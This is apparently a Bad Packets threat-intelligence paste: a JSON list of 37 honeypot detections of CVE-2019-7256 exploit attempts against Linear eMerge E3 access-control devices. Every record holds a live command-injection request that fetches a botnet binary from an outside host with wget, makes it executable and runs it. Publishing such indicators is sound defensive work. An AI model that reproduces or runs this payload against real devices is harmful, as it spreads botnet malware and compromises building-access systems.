badpackets

CVE-2019-7256 exploit attempts detected by Bad Packets

Jan 10th, 2020
1,935
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. {
  2.   "count": 37,
  3.   "next": null,
  4.   "previous": null,
  5.   "results": [
  6.     {
  7.       "source_ip_address": "94.86.232.58",
  8.       "country": "IT",
  9.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  10.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  11.       "post_data": "",
  12.       "target_port": 80,
  13.       "protocol": "tcp",
  14.       "tags": [
  15.         {
  16.           "cve": "CVE-2019-7256",
  17.           "category": "IoT",
  18.           "description": "Linear eMerge E3 Remote Command Injection"
  19.         }
  20.       ],
  21.       "event_count": 1,
  22.       "first_seen": "2020-01-10T05:40:28Z",
  23.       "last_seen": "2020-01-10T05:40:28Z"
  24.     },
  25.     {
  26.       "source_ip_address": "212.131.99.54",
  27.       "country": "IT",
  28.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  29.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  30.       "post_data": "",
  31.       "target_port": 80,
  32.       "protocol": "tcp",
  33.       "tags": [
  34.         {
  35.           "cve": "CVE-2019-7256",
  36.           "category": "IoT",
  37.           "description": "Linear eMerge E3 Remote Command Injection"
  38.         }
  39.       ],
  40.       "event_count": 1,
  41.       "first_seen": "2020-01-10T05:16:01Z",
  42.       "last_seen": "2020-01-10T05:16:01Z"
  43.     },
  44.     {
  45.       "source_ip_address": "80.20.246.9",
  46.       "country": "IT",
  47.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  48.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  49.       "post_data": "",
  50.       "target_port": 80,
  51.       "protocol": "tcp",
  52.       "tags": [
  53.         {
  54.           "cve": "CVE-2019-7256",
  55.           "category": "IoT",
  56.           "description": "Linear eMerge E3 Remote Command Injection"
  57.         }
  58.       ],
  59.       "event_count": 17,
  60.       "first_seen": "2020-01-08T23:00:08Z",
  61.       "last_seen": "2020-01-10T04:16:15Z"
  62.     },
  63.     {
  64.       "source_ip_address": "194.184.31.194",
  65.       "country": "IT",
  66.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  67.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  68.       "post_data": "",
  69.       "target_port": 80,
  70.       "protocol": "tcp",
  71.       "tags": [
  72.         {
  73.           "cve": "CVE-2019-7256",
  74.           "category": "IoT",
  75.           "description": "Linear eMerge E3 Remote Command Injection"
  76.         }
  77.       ],
  78.       "event_count": 1,
  79.       "first_seen": "2020-01-10T03:16:17Z",
  80.       "last_seen": "2020-01-10T03:16:17Z"
  81.     },
  82.     {
  83.       "source_ip_address": "88.44.33.166",
  84.       "country": "IT",
  85.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  86.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  87.       "post_data": "",
  88.       "target_port": 80,
  89.       "protocol": "tcp",
  90.       "tags": [
  91.         {
  92.           "cve": "CVE-2019-7256",
  93.           "category": "IoT",
  94.           "description": "Linear eMerge E3 Remote Command Injection"
  95.         }
  96.       ],
  97.       "event_count": 1,
  98.       "first_seen": "2020-01-10T02:38:05Z",
  99.       "last_seen": "2020-01-10T02:38:05Z"
  100.     },
  101.     {
  102.       "source_ip_address": "80.22.248.19",
  103.       "country": "IT",
  104.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  105.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  106.       "post_data": "",
  107.       "target_port": 80,
  108.       "protocol": "tcp",
  109.       "tags": [
  110.         {
  111.           "cve": "CVE-2019-7256",
  112.           "category": "IoT",
  113.           "description": "Linear eMerge E3 Remote Command Injection"
  114.         }
  115.       ],
  116.       "event_count": 2,
  117.       "first_seen": "2020-01-10T02:17:36Z",
  118.       "last_seen": "2020-01-10T02:17:49Z"
  119.     },
  120.     {
  121.       "source_ip_address": "94.89.40.90",
  122.       "country": "IT",
  123.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  124.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  125.       "post_data": "",
  126.       "target_port": 80,
  127.       "protocol": "tcp",
  128.       "tags": [
  129.         {
  130.           "cve": "CVE-2019-7256",
  131.           "category": "IoT",
  132.           "description": "Linear eMerge E3 Remote Command Injection"
  133.         }
  134.       ],
  135.       "event_count": 1,
  136.       "first_seen": "2020-01-10T01:45:59Z",
  137.       "last_seen": "2020-01-10T01:45:59Z"
  138.     },
  139.     {
  140.       "source_ip_address": "62.86.247.158",
  141.       "country": "IT",
  142.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  143.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  144.       "post_data": "",
  145.       "target_port": 80,
  146.       "protocol": "tcp",
  147.       "tags": [
  148.         {
  149.           "cve": "CVE-2019-7256",
  150.           "category": "IoT",
  151.           "description": "Linear eMerge E3 Remote Command Injection"
  152.         }
  153.       ],
  154.       "event_count": 1,
  155.       "first_seen": "2020-01-10T00:51:15Z",
  156.       "last_seen": "2020-01-10T00:51:15Z"
  157.     },
  158.     {
  159.       "source_ip_address": "80.19.63.97",
  160.       "country": "IT",
  161.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  162.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  163.       "post_data": "",
  164.       "target_port": 80,
  165.       "protocol": "tcp",
  166.       "tags": [
  167.         {
  168.           "cve": "CVE-2019-7256",
  169.           "category": "IoT",
  170.           "description": "Linear eMerge E3 Remote Command Injection"
  171.         }
  172.       ],
  173.       "event_count": 1,
  174.       "first_seen": "2020-01-09T21:49:29Z",
  175.       "last_seen": "2020-01-09T21:49:29Z"
  176.     },
  177.     {
  178.       "source_ip_address": "82.191.134.50",
  179.       "country": "IT",
  180.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  181.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  182.       "post_data": "",
  183.       "target_port": 80,
  184.       "protocol": "tcp",
  185.       "tags": [
  186.         {
  187.           "cve": "CVE-2019-7256",
  188.           "category": "IoT",
  189.           "description": "Linear eMerge E3 Remote Command Injection"
  190.         }
  191.       ],
  192.       "event_count": 1,
  193.       "first_seen": "2020-01-09T21:19:03Z",
  194.       "last_seen": "2020-01-09T21:19:03Z"
  195.     },
  196.     {
  197.       "source_ip_address": "121.129.86.177",
  198.       "country": "KR",
  199.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  200.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  201.       "post_data": "",
  202.       "target_port": 80,
  203.       "protocol": "tcp",
  204.       "tags": [
  205.         {
  206.           "cve": "CVE-2019-7256",
  207.           "category": "IoT",
  208.           "description": "Linear eMerge E3 Remote Command Injection"
  209.         }
  210.       ],
  211.       "event_count": 1,
  212.       "first_seen": "2020-01-09T20:58:18Z",
  213.       "last_seen": "2020-01-09T20:58:18Z"
  214.     },
  215.     {
  216.       "source_ip_address": "82.185.164.127",
  217.       "country": "IT",
  218.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  219.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  220.       "post_data": "",
  221.       "target_port": 80,
  222.       "protocol": "tcp",
  223.       "tags": [
  224.         {
  225.           "cve": "CVE-2019-7256",
  226.           "category": "IoT",
  227.           "description": "Linear eMerge E3 Remote Command Injection"
  228.         }
  229.       ],
  230.       "event_count": 1,
  231.       "first_seen": "2020-01-09T20:52:49Z",
  232.       "last_seen": "2020-01-09T20:52:49Z"
  233.     },
  234.     {
  235.       "source_ip_address": "5.97.95.10",
  236.       "country": "IT",
  237.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  238.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  239.       "post_data": "",
  240.       "target_port": 80,
  241.       "protocol": "tcp",
  242.       "tags": [
  243.         {
  244.           "cve": "CVE-2019-7256",
  245.           "category": "IoT",
  246.           "description": "Linear eMerge E3 Remote Command Injection"
  247.         }
  248.       ],
  249.       "event_count": 2,
  250.       "first_seen": "2020-01-09T01:01:24Z",
  251.       "last_seen": "2020-01-09T19:45:06Z"
  252.     },
  253.     {
  254.       "source_ip_address": "88.34.126.169",
  255.       "country": "IT",
  256.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  257.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  258.       "post_data": "",
  259.       "target_port": 80,
  260.       "protocol": "tcp",
  261.       "tags": [
  262.         {
  263.           "cve": "CVE-2019-7256",
  264.           "category": "IoT",
  265.           "description": "Linear eMerge E3 Remote Command Injection"
  266.         }
  267.       ],
  268.       "event_count": 125,
  269.       "first_seen": "2020-01-09T05:11:15Z",
  270.       "last_seen": "2020-01-09T18:26:35Z"
  271.     },
  272.     {
  273.       "source_ip_address": "62.86.190.255",
  274.       "country": "IT",
  275.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  276.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  277.       "post_data": "",
  278.       "target_port": 80,
  279.       "protocol": "tcp",
  280.       "tags": [
  281.         {
  282.           "cve": "CVE-2019-7256",
  283.           "category": "IoT",
  284.           "description": "Linear eMerge E3 Remote Command Injection"
  285.         }
  286.       ],
  287.       "event_count": 3,
  288.       "first_seen": "2020-01-09T17:27:22Z",
  289.       "last_seen": "2020-01-09T17:27:22Z"
  290.     },
  291.     {
  292.       "source_ip_address": "117.7.238.102",
  293.       "country": "VN",
  294.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  295.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  296.       "post_data": "",
  297.       "target_port": 80,
  298.       "protocol": "tcp",
  299.       "tags": [
  300.         {
  301.           "cve": "CVE-2019-7256",
  302.           "category": "IoT",
  303.           "description": "Linear eMerge E3 Remote Command Injection"
  304.         }
  305.       ],
  306.       "event_count": 1,
  307.       "first_seen": "2020-01-09T16:34:27Z",
  308.       "last_seen": "2020-01-09T16:34:27Z"
  309.     },
  310.     {
  311.       "source_ip_address": "151.22.65.134",
  312.       "country": "IT",
  313.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  314.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  315.       "post_data": "",
  316.       "target_port": 80,
  317.       "protocol": "tcp",
  318.       "tags": [
  319.         {
  320.           "cve": "CVE-2019-7256",
  321.           "category": "IoT",
  322.           "description": "Linear eMerge E3 Remote Command Injection"
  323.         }
  324.       ],
  325.       "event_count": 3,
  326.       "first_seen": "2020-01-09T13:56:02Z",
  327.       "last_seen": "2020-01-09T13:56:02Z"
  328.     },
  329.     {
  330.       "source_ip_address": "80.19.0.6",
  331.       "country": "IT",
  332.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  333.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  334.       "post_data": "",
  335.       "target_port": 80,
  336.       "protocol": "tcp",
  337.       "tags": [
  338.         {
  339.           "cve": "CVE-2019-7256",
  340.           "category": "IoT",
  341.           "description": "Linear eMerge E3 Remote Command Injection"
  342.         }
  343.       ],
  344.       "event_count": 1,
  345.       "first_seen": "2020-01-09T13:30:25Z",
  346.       "last_seen": "2020-01-09T13:30:25Z"
  347.     },
  348.     {
  349.       "source_ip_address": "37.55.18.222",
  350.       "country": "UA",
  351.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  352.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  353.       "post_data": "",
  354.       "target_port": 80,
  355.       "protocol": "tcp",
  356.       "tags": [
  357.         {
  358.           "cve": "CVE-2019-7256",
  359.           "category": "IoT",
  360.           "description": "Linear eMerge E3 Remote Command Injection"
  361.         }
  362.       ],
  363.       "event_count": 1,
  364.       "first_seen": "2020-01-09T12:24:08Z",
  365.       "last_seen": "2020-01-09T12:24:08Z"
  366.     },
  367.     {
  368.       "source_ip_address": "217.141.51.113",
  369.       "country": "IT",
  370.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  371.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  372.       "post_data": "",
  373.       "target_port": 80,
  374.       "protocol": "tcp",
  375.       "tags": [
  376.         {
  377.           "cve": "CVE-2019-7256",
  378.           "category": "IoT",
  379.           "description": "Linear eMerge E3 Remote Command Injection"
  380.         }
  381.       ],
  382.       "event_count": 14,
  383.       "first_seen": "2020-01-09T11:29:07Z",
  384.       "last_seen": "2020-01-09T11:29:07Z"
  385.     },
  386.     {
  387.       "source_ip_address": "88.34.126.171",
  388.       "country": "IT",
  389.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  390.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  391.       "post_data": "",
  392.       "target_port": 80,
  393.       "protocol": "tcp",
  394.       "tags": [
  395.         {
  396.           "cve": "CVE-2019-7256",
  397.           "category": "IoT",
  398.           "description": "Linear eMerge E3 Remote Command Injection"
  399.         }
  400.       ],
  401.       "event_count": 1,
  402.       "first_seen": "2020-01-09T11:17:11Z",
  403.       "last_seen": "2020-01-09T11:17:11Z"
  404.     },
  405.     {
  406.       "source_ip_address": "194.184.185.69",
  407.       "country": "IT",
  408.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  409.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  410.       "post_data": "",
  411.       "target_port": 80,
  412.       "protocol": "tcp",
  413.       "tags": [
  414.         {
  415.           "cve": "CVE-2019-7256",
  416.           "category": "IoT",
  417.           "description": "Linear eMerge E3 Remote Command Injection"
  418.         }
  419.       ],
  420.       "event_count": 8,
  421.       "first_seen": "2020-01-09T10:00:31Z",
  422.       "last_seen": "2020-01-09T10:00:31Z"
  423.     },
  424.     {
  425.       "source_ip_address": "2.115.218.177",
  426.       "country": "IT",
  427.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  428.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  429.       "post_data": "",
  430.       "target_port": 80,
  431.       "protocol": "tcp",
  432.       "tags": [
  433.         {
  434.           "cve": "CVE-2019-7256",
  435.           "category": "IoT",
  436.           "description": "Linear eMerge E3 Remote Command Injection"
  437.         }
  438.       ],
  439.       "event_count": 1,
  440.       "first_seen": "2020-01-09T08:11:20Z",
  441.       "last_seen": "2020-01-09T08:11:20Z"
  442.     },
  443.     {
  444.       "source_ip_address": "103.47.12.186",
  445.       "country": "IN",
  446.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  447.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  448.       "post_data": "",
  449.       "target_port": 80,
  450.       "protocol": "tcp",
  451.       "tags": [
  452.         {
  453.           "cve": "CVE-2019-7256",
  454.           "category": "IoT",
  455.           "description": "Linear eMerge E3 Remote Command Injection"
  456.         }
  457.       ],
  458.       "event_count": 8,
  459.       "first_seen": "2020-01-09T07:51:49Z",
  460.       "last_seen": "2020-01-09T07:51:49Z"
  461.     },
  462.     {
  463.       "source_ip_address": "87.27.137.227",
  464.       "country": "IT",
  465.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  466.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  467.       "post_data": "",
  468.       "target_port": 80,
  469.       "protocol": "tcp",
  470.       "tags": [
  471.         {
  472.           "cve": "CVE-2019-7256",
  473.           "category": "IoT",
  474.           "description": "Linear eMerge E3 Remote Command Injection"
  475.         }
  476.       ],
  477.       "event_count": 1,
  478.       "first_seen": "2020-01-09T07:43:30Z",
  479.       "last_seen": "2020-01-09T07:43:30Z"
  480.     },
  481.     {
  482.       "source_ip_address": "5.97.218.186",
  483.       "country": "IT",
  484.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  485.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  486.       "post_data": "",
  487.       "target_port": 80,
  488.       "protocol": "tcp",
  489.       "tags": [
  490.         {
  491.           "cve": "CVE-2019-7256",
  492.           "category": "IoT",
  493.           "description": "Linear eMerge E3 Remote Command Injection"
  494.         }
  495.       ],
  496.       "event_count": 1,
  497.       "first_seen": "2020-01-09T06:11:30Z",
  498.       "last_seen": "2020-01-09T06:11:30Z"
  499.     },
  500.     {
  501.       "source_ip_address": "82.185.31.226",
  502.       "country": "IT",
  503.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  504.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  505.       "post_data": "",
  506.       "target_port": 80,
  507.       "protocol": "tcp",
  508.       "tags": [
  509.         {
  510.           "cve": "CVE-2019-7256",
  511.           "category": "IoT",
  512.           "description": "Linear eMerge E3 Remote Command Injection"
  513.         }
  514.       ],
  515.       "event_count": 1,
  516.       "first_seen": "2020-01-09T05:34:27Z",
  517.       "last_seen": "2020-01-09T05:34:27Z"
  518.     },
  519.     {
  520.       "source_ip_address": "31.195.231.10",
  521.       "country": "IT",
  522.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  523.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  524.       "post_data": "",
  525.       "target_port": 80,
  526.       "protocol": "tcp",
  527.       "tags": [
  528.         {
  529.           "cve": "CVE-2019-7256",
  530.           "category": "IoT",
  531.           "description": "Linear eMerge E3 Remote Command Injection"
  532.         }
  533.       ],
  534.       "event_count": 1,
  535.       "first_seen": "2020-01-09T05:30:52Z",
  536.       "last_seen": "2020-01-09T05:30:52Z"
  537.     },
  538.     {
  539.       "source_ip_address": "104.158.231.5",
  540.       "country": "CA",
  541.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  542.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  543.       "post_data": "",
  544.       "target_port": 80,
  545.       "protocol": "tcp",
  546.       "tags": [
  547.         {
  548.           "cve": "CVE-2019-7256",
  549.           "category": "IoT",
  550.           "description": "Linear eMerge E3 Remote Command Injection"
  551.         }
  552.       ],
  553.       "event_count": 1,
  554.       "first_seen": "2020-01-09T04:36:41Z",
  555.       "last_seen": "2020-01-09T04:36:41Z"
  556.     },
  557.     {
  558.       "source_ip_address": "88.44.33.170",
  559.       "country": "IT",
  560.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  561.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  562.       "post_data": "",
  563.       "target_port": 80,
  564.       "protocol": "tcp",
  565.       "tags": [
  566.         {
  567.           "cve": "CVE-2019-7256",
  568.           "category": "IoT",
  569.           "description": "Linear eMerge E3 Remote Command Injection"
  570.         }
  571.       ],
  572.       "event_count": 118,
  573.       "first_seen": "2020-01-09T04:32:25Z",
  574.       "last_seen": "2020-01-09T04:32:25Z"
  575.     },
  576.     {
  577.       "source_ip_address": "2.119.205.70",
  578.       "country": "IT",
  579.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  580.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  581.       "post_data": "",
  582.       "target_port": 80,
  583.       "protocol": "tcp",
  584.       "tags": [
  585.         {
  586.           "cve": "CVE-2019-7256",
  587.           "category": "IoT",
  588.           "description": "Linear eMerge E3 Remote Command Injection"
  589.         }
  590.       ],
  591.       "event_count": 1,
  592.       "first_seen": "2020-01-09T03:45:31Z",
  593.       "last_seen": "2020-01-09T03:45:31Z"
  594.     },
  595.     {
  596.       "source_ip_address": "142.54.69.254",
  597.       "country": "US",
  598.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  599.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  600.       "post_data": "",
  601.       "target_port": 80,
  602.       "protocol": "tcp",
  603.       "tags": [
  604.         {
  605.           "cve": "CVE-2019-7256",
  606.           "category": "IoT",
  607.           "description": "Linear eMerge E3 Remote Command Injection"
  608.         }
  609.       ],
  610.       "event_count": 3,
  611.       "first_seen": "2020-01-09T03:37:50Z",
  612.       "last_seen": "2020-01-09T03:37:50Z"
  613.     },
  614.     {
  615.       "source_ip_address": "88.56.20.102",
  616.       "country": "IT",
  617.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  618.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  619.       "post_data": "",
  620.       "target_port": 80,
  621.       "protocol": "tcp",
  622.       "tags": [
  623.         {
  624.           "cve": "CVE-2019-7256",
  625.           "category": "IoT",
  626.           "description": "Linear eMerge E3 Remote Command Injection"
  627.         }
  628.       ],
  629.       "event_count": 2,
  630.       "first_seen": "2020-01-09T03:29:25Z",
  631.       "last_seen": "2020-01-09T03:29:25Z"
  632.     },
  633.     {
  634.       "source_ip_address": "62.86.25.151",
  635.       "country": "IT",
  636.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  637.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  638.       "post_data": "",
  639.       "target_port": 80,
  640.       "protocol": "tcp",
  641.       "tags": [
  642.         {
  643.           "cve": "CVE-2019-7256",
  644.           "category": "IoT",
  645.           "description": "Linear eMerge E3 Remote Command Injection"
  646.         }
  647.       ],
  648.       "event_count": 1,
  649.       "first_seen": "2020-01-09T02:37:53Z",
  650.       "last_seen": "2020-01-09T02:37:53Z"
  651.     },
  652.     {
  653.       "source_ip_address": "62.86.6.98",
  654.       "country": "IT",
  655.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  656.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  657.       "post_data": "",
  658.       "target_port": 80,
  659.       "protocol": "tcp",
  660.       "tags": [
  661.         {
  662.           "cve": "CVE-2019-7256",
  663.           "category": "IoT",
  664.           "description": "Linear eMerge E3 Remote Command Injection"
  665.         }
  666.       ],
  667.       "event_count": 4,
  668.       "first_seen": "2020-01-09T00:30:48Z",
  669.       "last_seen": "2020-01-09T00:30:48Z"
  670.     },
  671.     {
  672.       "source_ip_address": "221.195.58.118",
  673.       "country": "CN",
  674.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  675.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear` HTTP/1.1",
  676.       "post_data": "",
  677.       "target_port": 80,
  678.       "protocol": "tcp",
  679.       "tags": [
  680.         {
  681.           "cve": "CVE-2019-7256",
  682.           "category": "IoT",
  683.           "description": "Linear eMerge E3 Remote Command Injection"
  684.         }
  685.       ],
  686.       "event_count": 1,
  687.       "first_seen": "2020-01-08T21:45:09Z",
  688.       "last_seen": "2020-01-08T21:45:09Z"
  689.     },
  690.     {
  691.       "source_ip_address": "201.243.44.64",
  692.       "country": "VE",
  693.       "user_agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
  694.       "payload": "GET /card_scan_decoder.php?No=30&door=`wget http://switchnets.net/hoho.armv7l; chmod 777 hoho.armv7l; ./hoho.armv7l linear` HTTP/1.1",
  695.       "post_data": "",
  696.       "target_port": 80,
  697.       "protocol": "tcp",
  698.       "tags": [
  699.         {
  700.           "cve": "CVE-2019-7256",
  701.           "category": "IoT",
  702.           "description": "Linear eMerge E3 Remote Command Injection"
  703.         }
  704.       ],
  705.       "event_count": 8,
  706.       "first_seen": "2019-12-29T10:23:48Z",
  707.       "last_seen": "2019-12-29T10:23:48Z"
  708.     }
  709.   ]
  710. }
RAW Paste Data